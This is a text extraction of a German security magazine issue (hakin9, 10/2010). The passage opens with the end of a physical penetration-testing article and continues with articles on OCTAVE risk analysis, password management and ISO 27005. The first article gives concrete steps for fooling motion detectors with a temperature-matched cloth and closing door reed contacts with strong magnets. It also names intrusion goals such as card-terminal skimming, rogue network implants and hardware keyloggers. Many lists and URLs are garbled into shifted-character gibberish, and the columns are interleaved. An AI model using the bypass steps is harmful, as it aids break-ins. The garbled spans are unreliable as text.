Je größer die Entfernung zu dem PIR Sensor ist, des-
to weniger nimmt eine Veränderung Einfluss auf die
einfallende Infrarotstrahlung in einem Bereich. Auch
haben Gegenstände mit gleicher Wärmestrahlung kei-
nen Einfluss auf die Sensoren. Einen Bewegungsmel-
der (auch einen Dualmelder) kann man deshalb mit ei-
nem Tuch überlisten. Zunächst lässt man das Tuch im
überwachten Raum einige Minuten liegen, damit es die
Abbildung 9. Eine Büroklammer ist an einer Schnurr befestigt. Temperatur der Umgebung annimmt. Wenn man sich
Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so jetzt in dieses Tuch einhüllt und seitwärts mit dem Rü-
stark, dass die Büroklammer in der Luft hängt. cken zum Bewegungsmelder langsam an diesem vor-

22 10/2010
Penetration Testing im Jahre 2010

beigeht, wird keine Bewegung angezeigt. Zwar merkt Magnet wird auf dem beweglichen Element in Höhe
bei einem Dualmelder der Ultraschall-Sensor die Be- des Kontaktes befestigt. Wirkt ein Magnetfeld auf den
wegung, da jedoch der Infrarot Sensor keine Bewe- Reed-Kontakt, ziehen sich die Schaltkontakte gegen-
gung meldet, findet keine Alarmierung statt. Würde seitig an und ein Stromkreis wird geschlossen. Lässt
man dieses Tuch etwa 30cm vor dem Bewegungsmel- das Magnetfeld nach, wenn z.B. eine Tür geöffnet wird
der aufspannen, würde man den Bewegungsmelder und sich der Magnet dem Reed-Kontakt entfernt, wird
außer Funktion setzen. Auch eine Abdeckerkennung der Stromkreis geöffnet. In diesem Fall wird dann der
würde hier nicht auslösen, da diese in der Regel bis Alarm ausgelöst.
20cm funktioniert.
Wie lassen sich Reed-Relais überlisten?
Gibt es Alternativen? Das ist vergleichbar einfach. Die Antwort auf diese Fra-
Sicherlich gibt es sie. Zunächst einmal gibt es Bewe- ge lautet natürlich: mit einem Magnetfeld. Hierfür eig-
gungsmelder, die auf Basis von Radarstrahlung funk- nen sich sogenannte „Todesmagneten“ (Abbildung 9.).
tionieren. Diese aktiven Bewegungsmelder können Diese Permanentmagneten haben ein extrem starkes
verdeckt z.B. unter einer Tapete oder Abdeckplatte in- Magnetfeld. Unter Laborbedingungen hat ein Reed-
stalliert werden. Dadurch ist ein solcher Bewegungs- Kontant bereits bei einer Entfernung von 40cm zum
meder sowohl optisch nicht wahrnehmbar als auch Magneten seine Schaltkontakte geschlossen. Holz-,
vor Sabotage und Vandalismus geschützt. Ein solcher Plastik- oder sogar Metall-Türen (sogar 2mm Stahl)
Bewegungsmelder arbeitet nach dem Dopplerprinzip bieten keine ausreichende Dämpfung für das Magnet-
und strahlt im 9GHz oder 24GHz-Mikrowellenbereich. feld.
Zwar halten sich die Hersteller solcher Geräte an die Eine bessere Alternative zu Reed-Relais sind Licht-
gesetzlichen Bestimmungen, ich würde allerdings im- oder Laserschranken. Diese Schranken bringt man so
mer auf eine zusätzliche Strahlenquelle verzichten, wo an, dass die Tür den Strahl beim öffnen unterbrechen
es geht. muss.
Eine weitere Alternative zu Bewegungsmeldern sind
Kameras. Zwar halte ich persönlich nichts von Über- Ziele eines solchen Angriffes
wachung und ständiger Videoaufzeichnung, doch Es sind viele Angriffsziele denkbar. Es kommt immer
Kameras sind sehr gute Bewegungsmelder. Im Ge- auf das Unternehmen an, dass angegriffen wird. Vor
gensatz zu den klassischen PIR, Ultraschall oder Ra- einigen Monaten berichtete die Presse über einen sol-
darbewegungsmeldern gibt es bei Kameras zahlrei- chen Angriff auf einen Baumarkt. Kriminelle Einbre-
che Bildpunkte, die ausgewertet werden können. Mit cher haben hier statt waren zu stehlen, die Elektronik
entsprechender Software kann man detektierte Bewe- der Karten-Terminals an den Kassen sabotiert, sodass
gungen analysieren und z.B. mit einer Objekterken- diese die eingelesenen Daten von EC- und Kreditkar-
nung interpretieren. Verdächtige Bilder lassen sich an ten samt der vom Kunden eingegebenen PIN per Funk
ein Sicherheitsunternehmen in Echtzeit übertragen, übermittelt wurden. Auf dem Parkplatz des Baumark-
wo ein Mensch beurteilt, ob ein Alarm ausgelöst wer- tes stand dann der Angreifer und hat die Daten emp-
den muss oder nicht. fangen.
Ein anderes Angriffsziel könnte der Anschluss eines
Reed-Relais Mini-Computers am Netzwerk sein, der ein Loch durch
Reed-Relais werden heute verwendet, um z.B. Tür- die Firewall bohrt und dem Angreifer einen permanen-
oder Fensteröffnungen zu detektieren. Ein Reed-Re- ten Zugriff auf das Netzwerk über das Internet gestat-
lais besteht einem Reed-Kontakt und einem Magne- tet. Auch ist die Installation eines Hardware-Keylogers
ten. Der Reed-Kontakt wird am Rahmen befestigt und denkbar, um die Zugangsdaten eines Mitarbeiters aus-
ist an die Einbruchmeldezentrale angeschlossen. Der zuspionieren.

Im Internet
t http://de.wikipedia.org/wiki/Lockpicking – Wikipedia Ein-
trag zum Thema Lockpicking
t http://www.evva.deo&JOGàISFOEFS)FSTUFMMFSWPO4DIMJF•
zylindern
t http://de.wikipedia.org/wiki/Reed-Relais – Wikipedia Ein-
trag zum Reed-Relais DIMITRI ROSCHKOWSKI
t http://www.elv.de – Artikel-Nr. 68-835-10 – Radar Bewe- Der Autor arbeitet bereits seit vielen Jahren als selbstständi-
gungsmelder ger IT-Sicherheitsexperte und Consultant. Er führt außerdem
t http://www.ettus.com/o)FSTUFMMFSEFT64314%34ZTUFNT
bei Unternehmen Penetration Tests durch.
Kontakt mit dem Autor: dimitri@roschkowski.biz

hakin9.org/de 23
12-11-2010

Die IT-Security Community Xchange ist DIE Weiterbildungsnacht für


SystemadministratorInnen, Lehrbeauftragte, StudentInnen, Schüler-
Innen, ExpertInnen und Geeks

hnell
Themen: Jetzt noch sc r:
te
anmelden un
stp.ac.at
„ Biometrie
:/ / it s e c x .f h
„ Penetration Testing http
„ Hackz und Crackz a h m e is t ko stenlos!
„ Privacy Die Teiln
„ Forensische Analyse
„ Intrusion Prevention, Malwarededection
„ Rootkits und deren Erkennung

Freitag, 12. November 2010, 17 – 24 Uhr


Fachhochschule St. Pölten
Matthias Corvinus-Straße 15, 3100 St. Pölten
T: +43/2742/313 228, E: office@fhstp.ac.at
I: www.fhstp.ac.at
OCTAVE

OCTAVE –Hier macht


das Risiko die Musik
Helmut Kaufmann
Die überwiegende Mehrheit von Unternehmen sind nach regulativen
Vorgaben wie z.B. Basel II, Solvency II, SOX, 8. EU Auditrichtlinie
oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares
Risikomanagement und Business Continuity Planning zu
implementieren.

IN DIESEM ARTIKEL ERFAHREN SIE... WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...


t &JOFOÃCFSCMJDLàCFSEJF3JTJLPBOBMZTFNFUIPEF0$5"7&VOE t (SVOEMFHFOEFT7FSTUÊOEOJTWPO3JTJLPBOBMZTFNFUIPEFO /PS
EJF.ÚHMJDILFJU EJFTFJOEBT3FHVMBUJW*40Y[VJOUFHSJF men und Standards.
ren.

m dies zielorientiert und auf die vorhandenen

U
ne Risikoanalyse erhält man einen organisationsweiten
Business Needs maßzuschneidern sind Risiko- Überblick über vorhandene Risiken und ist somit integ-
erkennung (Risikoanalyse) und deren anschlie- raler Bestandteil des Risikomanagements (vergl. Abb.
ßende Bewertung (Business Impact Analyse) die ersten 1).
Schritte, die gemacht werden müssen. OCTAVE ist eine risikobasierende, strategische Si-
Eine effektive Informations-Sicherheitsbewertung be- cherheitsbewertungs und -planungstechnik.
trachtet nicht nur den technologischen sondern auch OCTAVE® ist ein Kunstwort und setzt sich aus den
den dahinter liegenden organisatorischen Aspekt. Bei- Begriffen: Operationally Critical Threat, Asset, and Vul-
spielsweise die Handhabung der IT-Infrastruktur durch nerability Evaluation zusammen. Sie wurde von der
die MitarbeiterInnen bei ihrer täglichen Arbeit. Durch ei- Carnegie Mellon University, welche auch die populäre

Abbildung 1. Risikomanagementzyklus Abbildung 2. CIA

hakin9.org/de 25
ABWEHR

Web-Site www.cert.org betreibt, passend für die unter- heitspraxis und Technologie ins Gleichgewicht zu setz-
schiedlichsten Unternehmensgrößen, als lizenzfreie ten. Getrieben von zwei Grundaspekten – operationel-
Risikoanalyse Methode entwickelt. les Risiko und aktuell eingesetzte Sicherheitspraktiken,
OCTAVE ist eine selbstgesteuerte Methode. Das be- wird die dahinter liegende Technologie in Zusammen-
deutet, dass die MitarbeiterInnen einer Organisation hang mit der Sicherheitspraxis gegen die drei Eckpfeiler
eine wesentliche Rolle bei der Erstellung der Sicher- der Sicherheit geprüft (vergl. Abb 2.)
heitsstrategie übernehmen. Risiken von hoch kritisch OCTAVE ist ein wertegetriebener Bewertungsansatz.
erkannten Assets, werden dazu verwendet um eine Das Analysis Team
entsprechende Priorisierung der Sicherheitsbereiche
durchzuführen. ‡ ,GHQWL¿]LHUW LQIRUPDWLRQVEH]RJHQH $VVHWV GLH IU
Im Gegensatz zu typischen technologielastigen Be- die Organisation wichtig sind.
wertungsmethoden, die technologische Risiken und ‡ )RNXVVLHUW GLH $NWLYLWlWHQ GHU 5LVLNRDQDO\VH DXI
taktische Sachverhalte in den Mittelpunkt der Betrach- diejenigen Werte, die als besonders kritisch beur-
tung stellen, ist OCTAVE auf organisatorische Risiken teilt werden Berücksichtigt die Zusammenhänge
und deren dazu notwendigen Technologieeinsatz aus- zwischen den kritischen Assets, den Bedrohungen
gerichtet. Sie ist eine äußerst flexible Methode, die für und den Verwundbarkeiten
fast alle Organisationen speziell angepasst werden ‡ %HXUWHLOW 5LVLNHQ LQ HLQHP RSHUDWLRQHOOHQ =XVDP
kann. Aus der Sichtweise des Autors ist einer der be- menhang
merkenswertesten Vorteile jedoch, dass die Methode ‡ (QWZLFNHOW HLQH SUD[LVRULHQWLHUWH 6FKXW]VWUDWHJLH
von den MitarbeiterInnen selbst schnell erlernt und kon- (organisatorisch und auch einen Plan zur Reduzie-
tinuierlich durchgeführt werden kann und somit nach- rung der Risiken auf kritische Infrastrukturen)
haltig in den Risikomanagementprozess ohne weitere
Kosten integrierbar ist. Daraus resultiert ein dreiphasiges Vorgehensmo-
Ein ausgewähltes kleines Team aus allen operatio- dell für die Erhebung des gesamtorganisatorischen
nellen Bereichen der Organisation inklusive der IT Ab- Schutzbedürfnisses. (vergl. Abb. 3)
teilung arbeiten zusammen um die Sicherheitsbedürf-
nisse der Organisation zu identifizieren und versuchen ‡ 3KDVH Aufbau von Asset-basierenden Bedro-
die Gebiete: Operationelles Risiko, eingesetzte Sicher- KXQJVSUR¿OHQ– Das Analyse Team stellt informati-

Abbildung 3. Octave Phasen

26 10/2010
OCTAVE

onsbezogene Assets und deren Impact auf die Or- onseinheiten und von allen hierarchischen Ebenen
ganisation sowie deren derzeitige Schutzmechanis- – also von den MitarbeiterInnen über operationa-
men fest. Darauf aufbauend werden die kritischsten les und strategisches Management bis hin zum Ma-
$VVHWV GH¿QLHUW XQG GLH 6LFKHUKHLWVDQIRUGHUXQJHQ nagement der ersten Ebene, alle Sichtweisen und
dafür bestimmt. Anschließend wird für jedes kri- die damit verbundenen Bewertungen der kritisch-
WLVFKH $VVHW GLH %HGURKXQJHQ LGHQWL¿]LHUW XQG HLQ VWHQ $VVHWV LQ GLH *HVDPWEHXUWHLOXQJ PLW HLQÀLH‰HQ
HQWVSUHFKHQGHV%HGURKXQJVSUR¿OHUVWHOOW können.
‡ 3KDVH Erkennen von Verwundbarkeiten der Infra- OCTAVE generiert so eine organisationsweite Sicht
struktur – Hier wird die, hinter den kritischen Assets auf die aktuellen Informationssicherheitsrisiken.
liegende, Infrastruktur bewertet. Dabei werden kriti- )ROJHQGH6FKULWWHVLQGQDFKGHU5LVLNRDQDO\VH]XVHW
sche Infrastrukturpfade und informationstechnolo- zen:
gische Komponentenklassen aufgestellt und einer
technischen Überprüfung – dem Penetration Test – ‡ (UVWHOOXQJ HLQHV GHWDLOOLHUWHQ +DQGOXQJV3ODQHV
]XJHIKUW 'DV (UJHEQLV ÀLH‰W GDQQ LQ GLH %HZHU wie die erstellte Schutzstrategie und der Plan zur
tung direkt ein. Risikoreduzierung umgesetzt werden kann.
‡ 3KDVH (QWZLFNHOQ HLQHU 6LFKHUKHLWVVWUDWHJLH XQG ‡ =HLWOLQLHQJHVWHXHUWH 8PVHW]XQJ GHV HQWZRUIHQHQ
HLQHV 6LFKHUKHLWVSODQHV – In dieser Phase ent- Handlungs-Planes.
scheidet das Analyse-Team wie mit den kritischen
Assets umgegangen werden soll. Basierend auf die Überwachen/Beobachten des Handlungsplanes nach
ELV GDKLQ HUDUEHLWHWHQ 'DWHQ XQG )DNWHQ ZLUG HLQH Effektivität. Das beinhaltet z.B. das Beobachten der
organisationsweite Schutzstrategie und ein Plan für Risiken für jede Änderung.
die Reduzierung der erkannten Risiken, die auf die
kritischen Assets und deren Infrastrukturen einwir- ‡ .RQWUROOH GHV $EODXISODQHV GXUFK JHHLJQHWH 0HWUL
ken können erstellt. ken.

Die einzelnen Prozesse, die den drei Phasen hinter- Die OCTAVE Methode ersetzt kein Risikomanagement
legt sind, stellen sicher, dass von allen Organisati- sondern gehört in ein strukturiertes Risikomanage-

Abbildung 4. Octave und Risikomanagement

hakin9.org/de 27
ABWEHR

Abbildung 5. Mapping auf ISO 27001


ment eingebettet, welches nach einem SODQGRFKHFN plementieren und in der Umsetzungsphase den COBIT
act Zyklus arbeitet. (vergl. Abb 4) 4.0 Standard zu verwenden.
Die Organisation sollte in periodischen Abständen OCTAVE bildet die Grundlage der in der ISO 27001
ihre ermittelte Baseline zurücksetzen indem eine JHIRUGHUWHQ 5LVLNR$QDO\VH GXUFK )HVWOHJXQJ GHV %H
nochmalige Risikoanalyse durchgeführt wird. Diese trachtungsbereiches, feststellen von kritischen Orga-
Zeitspanne kann vorgegeben werden oder von wich- nisationswerten, qualitative und eventuell quantitative
tigen Ereignissen wie z.B. eine Restrukturierungs- Betrachtung von Risiken, Entwicklung von entspre-
maßnahme der z.B. Netzwerkinfrastruktur u.v.m. an- chenden Kontrollmaßnahmen um Risiken zu minimie-
gestoßen werden. Zwischen den Analysen kann die ren oder aber auch zu akzeptieren. Anschließend kann
Organisation periodisch neue Risiken identifizieren, man unter Zuhilfenahme von COBIT die, der ISO Norm
analysieren und in Relation zu bereits existieren- zugeschriebenen, Kontrollen implementieren. Man
den Risiken, Risiko reduzierende Maßnahmen entwi- kann somit die IT Sicherheitsstrategie der betrachteten
ckeln. Organisation mit einer Risikoanalyse nach dem OCTA-
Da die Risikoanalyse nur einen Teil des Risikoma- VE Ansatz, und dem standardisierten Reifegrad-Modell
nagements darstellt ist die OCTAVE Methode mit ih- nach COBIT - geprüft nach ISO 27001 - auswerten und
rer offenen Schnittstelle hervorragend geeignet um als umsetzen. (Verg. Abb. 5)
„Best Practice“-Grundlage die ISO 27001 Norm zu im-

Mehr Informationen:
t 0$5"7&www.cert.org/octave/
t $0#*5www.isaca.org MAG. HELMUT KAUFMANN, MSC
t *40 Y www.standards-online.net/InformationSecurity- Dozent an der Fachhochschule St. Pölten und u.a. tätig im Be-
Standard.htm reich Secure Data Center Management, Cloud Computing, Di-
saster Recovery and Business Continuity, Fraud Detection.

28 10/2010
News

Wetten, dass ... Ihr größtes


Betriebsgeheimnis ungeschützt ist?
Wie ein schlechter Sickerwitz, stellt man sich zuerst die Frage,
was ist unser größtes Betriebsgeheimnis: Die Kundenlisten,
die Projektdokumentationen und Strategiepapiere, die Zahlen
auf den Bankkonten oder gar die private Telefonnummer vom
Vorstandsvorsitzenden? Schlussendlich sind es die Passwörter
und Zugangsberechtigungen auf sämtliche Anwendungen und
Datenbanken in jedem Unternehmen oder Organisation.
Tausende Passwörter von Usern und rung eines automatisierten Passwort-Managements
Administratoren sind im Umlauf wird oft erst festgestellt, dass zehntausende privilegier-
Man stelle sich komplexe IT Landschaften vor, die geo- te Administratorkonten vorhanden sind, aber nur 20%
grafisch verteilt sind und viele Mitarbeiter, die in verschie- davon als Administratorkonten dienen. Der überwiegen-
dene „Rollen“ schlüpfen. Eine Buchhalterin hat nicht nur de Teil der Passwörter sind Application-to-Application
Zugang zu standardisierten Anwendungen, sondern auch (A2A) und Application-to-Database (A2D) Konten, die
zum Internetbanking, der FIBU Software und anderen in Skripts den Zugriff ermöglichen. Und natürlich nur in
kaufmännischen Programmen wie SAP. Interessant und seltensten Fällen geändert werden und somit immer ei-
zunehmend komplex wird es bei den IT Administratoren. ne Hintertüre, auch für den Ex-Mitarbeiter, offenlassen.
Natürlich können sich diese, von vielen für ihre mathema-
tischen Fähigkeiten bewunderten, auch nicht dutzende Die Passwort Autorität: Freiwilligkeit und
von Passwörtern merken, sondern helfen etwas nach: Pro Empfehlungen sind nicht angebracht
Anwendung wird ein Passwort vergeben, das sich diese Die Zugangsberechtigungen sind als Schlüssel für Safes
dann für längere Zeit im Gedächtnis behalten. Mit dieser mit allen Geheimnissen der Organisation anzusehen.. Das
Feststellung wird die gesamte Problematik sofort offenbar, Ergebnis einer Reflektion der Problematik „Passwörter“
ohne in technische Details gehen zu müssen: ein Pass- kann nur sein, dass ein automatisiertes und auditierbares
wort ... für längere Zeit ... im Gedächtnis. Software-Werkzeug in Frage kommen kann. Die Durchset-
zung der Passwörter Policies, Zuteilung von Einmal-Pass-
Guter Rat ist teuer - und umsonst wörtern und vor allem eine sichere Authentifizierung und
Richtlinien zur Passwortgestaltung gibt es unzählige und Ablage dieser ist natürlich ebenso ein Must-Have. In Zeiten
viele sind gut gemeint: Die Länge wird vorgegeben und wie diesen, sollte es auf Knopfdruck möglich sein, einen Ad-
auch die zu verwendenden Zeichen, die alle 4 Wochen ministrator zu sperren oder zeitlich begrenzte Passwörter
zu ändern sind und natürlich nicht auf einem Post-It unter für externe Dienstleister ausstellen zu können.
der Tastatur kleben sollen. Selbst wenn dies eingehal- Antares NetlogiX empfiehlt nach eingehender Analy-
ten wird, vergisst man sein neues Passwort spätestens, se - des sehr überschaubaren Marktes - die Lösung
wenn man 2 Wochen auf Urlaub war und auch der Help- „Cloakware Password Authority“. Die ersten erfolgrei-
Desk freut sich, dass man wieder zurück ist. Auch der chen Referenzprojekte und Kundenmeinungen haben
Auditor ist zumindest milde gestimmt, wenn die zentralen diese Meinung weiter verstärkt.
Passwörter zumindest in einer gesicherten Excel Liste
zusammengefasst sind. Von IT Security sollte man aber
dabei besser nicht sprechen, da jeder Administrator auf
alle Passwörter zugreifen kann. Spätestens bei automa-
tisierten (unattended) Passwörtern, die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen,
sind verhaltensorientierte Ansätze obsolete.

Passwortstruktur ist unbekannt


Kaum ein IT Verantwortlicher hat verlässliche Informa-
tionen über die Strukturen und Verbreitungsgrade von
Passwörtern in einer Organisation. Bei Implementie-

hakin9.org/de 29
ABWEHR

IT-Risikomanagement
– Wozu brauche ich das?
Andreas Lentwojt
In der letzten Ausgabe habe ich Ihnen ausführlich die Norm
ISO/IEC 27001 vorgestellt und einen kurzen Einblick in die
27000-Familie gegeben. Ein Teil dieser Familie ist die ISO 27005, die
sich mit dem IT-Risikomanagement befasst.

IN DIESEM ARTIKEL ERFAHREN SIE... WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...


t JOXFMDIFN,POUFYUTJDIEJF*40*&$CFXFHU t ,FOOUOJTTFàCFS*54JDIFSIFJUJONJUUMFSFOHSڕFSFO6OUFSOFI
t EFO"VGCBVEFS/PSN men
t NFISàCFSEFO"CMBVGEFT3JTJLPNBOBHFNFOU1SP[FTTFT t ,FOOUOJTTF àCFS EJF &JHFOTDIBGUFO FJOFT *4.4 [# OBDI *40
IEC 27001)

n der heutigen Ausgabe werde ich Ihnen darstellen,

I
Größere Unternehmen sind schon von Gesetz her
warum es nützlich ist, sich mit dem Risikomanage- verpflichtet, sich mit dem Themenbereich Risiko-
ment der IT zu beschäftigen und dabei auf das Mo- management zu beschäftigen (Aktiengesetz, Kon-
dell der ISO 27005 zurück zu greifen. TraG, GmbH-Gesetz u.Ä.). Ein Teil dieses Risikoma-
Auf dieses Thema wurde bereits in einer früheren nagements ist das IT-Risikomanagement, welches
Ausgabe eingegangen, in diesem Artikel wird aber sich – wie der Name es schon sagt – mit den Risi-
mehr auf die Norm und den eigentlichen Prozess mit ken im IT-Bereich beschäftigt. Eine Problematik beim
den einzelnen Schritten eingegangen. Risikomanagement, allgemein und speziell bei der

Abbildung 1. Aufbau eines Risikomanagementsystems (allgemein)

30 10/2010
IT-Risikomanagement – Wozu brauche ich das?

Informationstechnologie, ist die Bewertung der er- entgegenwirkt. Richtlinien wie Basel II oder Euro-SOX
kannten Risiken. Bereits seit einigen Jahren gab es fordern diese Ausrichtung seit langem.
nationale Normen, die sich mit einem standardisier- Die ISO 27005 ist branchen- und größenunabhängig.
ten Vorgehensmodell beschäftigten. Im Juni 2008 Somit können auch kleinere und mittlere Unternehmen
wurde daraus die international anerkannte Norm durch die Adaption der Inhalte auf die betrieblichen An-
ISO/IEC 27005:2008 (ehem. BS 7799-3:2006). ISO forderungen ein schlankes und effektives IT-Risikoma-
27005:2008 ist eine spezielle Ausprägung der ISO/IEC nagement aufbauen. Gerade sensible Branchen wie
31000:2009, die sich mit dem Risikomanagement all- Automotive, Healthcare, Software oder Telekommuni-
gemein befasst. Die genauen Bezeichnungen lauten: kation werden hier angesprochen. Aufgrund ähnlicher
Strukturen lässt sich die ISO 27005 ohne größeren Auf-
‡ ,62,(&  Ä5LVN 0DQDJHPHQW ± SULQFLS wand in ein unternehmensweites Risikomanagement
les and guidelines“ integrieren, kann aber auch »solo« umgesetzt werden.
‡ ,62,(&Ä,QIRUPDWLRQVHFXULW\ULVNPD Im Gegensatz zur ISO/IEC 27001 ist die ISO/IEC 27005
nagement“ selbst nicht zertifizierbar.

Warum überhaupt ein IT-Risikomanagementsystem im Kapitel 1


Unternehmens-Kontext? – Risikomanagementsystem allgemein
Datenverlust und -diebstahl gehören zu den größten Wie bei der ISO 27001 geht es auch bei der ISO 27005
Problemen in Unternehmen. Bisher bezog sich Risiko- nicht um das „was“, sondern um das „wie“. Es ist ein
management in Unternehmen hauptsächlich auf Markt- Leitfaden zur Implementierung eines Risikoprozesses
und Adressrisiken sowie auf finanzielle Risikofaktoren. im Kontext der Informations- und Telekommunikations-
Das Risikomanagement im IT-Bereich wurde weitgehend technologie. Wie sieht so ein Risikoprozess nun aus?
vernachlässigt. Dabei lassen sich Sicherheitslücken mit- Ganz allgemein betrachtet geht es wiederum um ein
tels Risikomanagement aufdecken und minimieren, was Managementsystem, welches aus 6 Schritten (vergl.
auch Regressforderungen an die Unternehmensführung Abb. 1) besteht:

Abbildung 2. Aufbau der ISO 27005:2008

hakin9.org/de 31
ABWEHR

‡ )HVWOHJXQJGHU5LVLNRIHOGHU ‡ GHU$QDO\VHGHU5LVLNRDXVZLUNXQJHQVRZLHGHU$E


‡ 5LVLNRHUNHQQXQJXQG±DQDO\VH schätzung der Risikowahrscheinlichkeit und des Ri-
‡ .RPPXQLNDWLRQ sikoniveaus
‡ 9HUDQWZRUWOLFKNHLWHQXQG$XIJDEHQ ‡ 2SWLRQHQ]XU5LVLNREHKDQGOXQJ
‡ hEHUZDFKXQJVXQG.RQWUROOV\VWHP ‡ ,GHQWL¿NDWLRQXQG(YDOXDWLRQYRQSDVVHQGHQ5LVLNR
‡ 'RNXPHQWDWLRQGHUJHWURIIHQHQ0D‰QDKPHQ managementmaßnahmen

Kapitel 2 – Der Standard ISO/IEC 27005:2008 'HU$XIEDXZLUGLQGHU*UD¿NGHXWOLFK YHUJO$EE 


Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly- Aus diesen einzelnen Kapiteln der Norm wird der IT-
se und zum Risikomanagement im IT Bereich dar. Sie Sicherheitsprozess entwickelt (vergl. Abb. 3).
beinhaltet dabei einerseits eine Beschreibung des kom-
pletten Risikomanagementprozesses als Ganzes und Kapitel 3 – Die Phasen
andererseits eine genaue Beschreibung der einzelnen
Schritte des Risikomanagementprozesses und der Ri- Definition der Rahmenbedingungen
sikoanalyse. Die Anhänge der IEC 27005 liefern zudem In einem ersten Schritt wird in einer Schutzbedarfsfest-
nützliche Informationen zur Implementierung eines Ri- stellung (High Level Risk Analysis) der Schutzbedarf für
sikomanagementsystems im Bereich Informationssi- GLH HLQ]HOQHQ ,76\VWHPH HUPLWWHOW )U ,76\VWHPH GHU
FKHUKHLWXQGGDPLW]XU(UIOOXQJYRQ)RUGHUXQJHQGHU Schutzbedarfskategorie "niedrig bis hoch" wird i.d.R. auf
Norm ISO 27001: eine detaillierte Risikoanalyse verzichtet. Dies erlaubt ei-
ne schnelle und effektive Auswahl von grundlegenden
‡ HLQHUNODUHQ9RUJHKHQVZHLVH]XU(LQVFKlW]XQJYRQ Sicherheitsmaßnahmen bei gleichzeitiger Gewährleis-
5LVLNHQLQNOGHU)HVWOHJXQJYRQ$N]HSWDQ]NULWHULHQ tung eines angemessenen Schutzniveaus. IT-Systeme
‡ GHU ,GHQWL¿NDWLRQ YRQ 5LVLNHQ LQVEHVRQGHUH EH]R der Schutzbedarfskategorie „sehr hoch" sind einer de-
gen auf bedrohte Werte, direkte und indirekte Be- taillierten Risikoanalyse zu unterziehen, auf deren Basis
drohungen und Schwachstellen individuelle Sicherheitsmaßnahmen ausgewählt werden.

Abbildung 3. Der Sicherheitsprozess gem. ISO 27005:2008

32 10/2010
IT-Risikomanagement – Wozu brauche ich das?

Diese Option kombiniert die Vorteile des Grund- werte entsprechen, da sich die Werte in Kombination er-
schutz- und des Risikoanalyseansatzes, da alle IT- gänzen und einen höheren Wert darstellen.
Systeme mit hohem Schutzbedarf wirksam und ange- Die zu schützenden Werte sind vielfältigen Be-
messen geschützt werden. Maßnahmen können für die drohungen ausgesetzt. Im Rahmen der Risikoana-
anderen Systeme mit Hilfe des Grundschutzes schnell lyse ist nun die Eintrittswahrscheinlichkeit abzu-
und effektiv ausgewählt werden. Diese Methode stellt in schätzen.
den meisten Einsatzumgebungen eine empfehlenswer- Bedrohungen sind charakterisiert durch:
te Strategie zur Risikoanalyse dar.
Zu den einzelnen Kriterien, die festgelegt werden ‡ LKUHQ8UVSUXQJ 1DWXU0HQVFK
müssen gehören u.a. ‡ LKUH 0RWLYDWLRQ ¿QDQ]LHOOH *UQGH :HWWEHZHUEV-
vorteile, Rache)
‡ (LQÀXVVJU|‰HQIUGLH%HZHUWXQJ ‡ GLH+lX¿JNHLWGHV$XIWUHWHQV
‡ .ULWHULHQIUGLH5LVLNRDN]HSWDQ] ‡ GLH *U|‰H GHV 6FKDGHQV GHU GXUFK GLHVH %HGUR-
‡ 8PIDQJXQG*UHQ]HQGHV50 hung verursacht werden kann.
‡ 2UJDQLVDWLRQXQG9HUDQWZRUWOLFKNHLWHQ
)UHLQLJHXPZHOWEHGLQJWH%HGURKXQJHQ HWZD(UGEH-
Risikobewertung ben, Blitzschlag, ...) liegen statistische Daten vor, die
Die Risikobewertung gliedert sich in die beiden Vor- für die Einschätzung hilfreich sein können.
gänge Risikoanalyse und der Priorisierung der Risiken. Die Bedrohungsanalyse umfasst im Einzelnen:
Die Risikoanalyse ist sicherlich der schwierigste und
aufwendigste Teil, müssen doch zunächst die Risiken ‡ GLH,GHQWL¿NDWLRQP|JOLFKHU%HGURKXQJHQ
LGHQWLIL]LHUWXQGGDQDFKEHZHUWHWZHUGHQ)UDOOHÄ$V- ‡ GLH(UPLWWOXQJGHU(LQWULWWVZDKUVFKHLQOLFKNHLWHQ
sets“ des Unternehmens wird folgender Prozess durch-
laufen: Bedrohungen können unterteilt werden in:

‡ $VVHWLGHQWL¿]LHUHQ ‡ +|KHUH*HZDOW %OLW]VFKODJ)HXHU(UGEHEHQ3HU-


‡ :HUWEHVWLPPHQ sonalausfall)
‡ HYHQWXHOOH%HGURKXQJHQ]XZHLVHQ ‡ 2UJDQLVDWRULVFKH 0lQJHO IHKOHQGH RGHU XQ]XUHL-
‡ ,VW0D‰QDKPHQHUKHEHQ chende Dokumentation)
‡ 6FKZDFKVWHOOHQHUKHEHQ ‡ 0HQVFKOLFKH )HKOKDQGOXQJHQ IHKOHUKDIWH 6\VWHP-
nutzung oder -administration, Nichtbeachtung von
Dieser Prozess wird für alle Assets wiederholt. Ein As- Sicherheitsmaßnahmen)
set im Sinne der ISO 27005 ist alles, was einen Wert ‡ 7HFKQLVFKHV9HUVDJHQ 6RIWZDUHIHKOHUGHIHNWH'D-
für die Organisation besitzt und daher schützenswert tenträger)
LVW(VLVWDOVRGXUFKDXVVLQQYROOEHLGHU'H¿QLWLRQGHU ‡ 9RUVlW]OLFKH +DQGOXQJHQ 0DQLSXODWLRQ=HUVW|UXQJ
Rahmenbedingungen den zu betrachtenden Rahmen von Geräten, Manipulation an Daten oder Software,
zunächst eng zu fassen. Er kann später immer noch Viren, trojanische Pferde)
erweitert werden. Die Norm unterteilt hierbei in primä-
re Assets (Geschäftsprozesse und –aktivitäten, Infor- Es ist wichtig, alle wesentlichen Bedrohungen zu er-
mationen) und unterstützende Assets (Hard- und Soft- fassen, da andernfalls Sicherheitslücken bestehen
ware, Netzwerk, Personal, Infrastruktur, etc.). Eine de- bleiben können. Im Anhang C der Norm ist eine um-
WDLOOLHUWH $XIVWHOOXQJ EH¿QGHW VLFK LP $QKDQJ % GHU fangreiche Listung von Bedrohungen vorhanden, je-
Norm. doch kann keine derartige Liste vollständig sein. Da-
Aus dem beschriebenen Prozess erfolgt eine Analyse rüber hinaus sind auch Bedrohungen einem ständigen
und Auflistung der Konsequenzen und letztendlich eine Wandel und einer ständigen Weiterentwicklung unter-
Risikoeinschätzung. worfen.
)UGLH:HUWHDQDO\VHN|QQHQXQWHUVFKLHGOLFKH0HWKR- Nachdem Werte und Bedrohungen erfasst wurden,
GHQ DQJHZHQGHW ZHUGHQ )U 6DFKZHUWH ]% HLQH %H- muss nun die Eintrittswahrscheinlichkeit zugeordnet
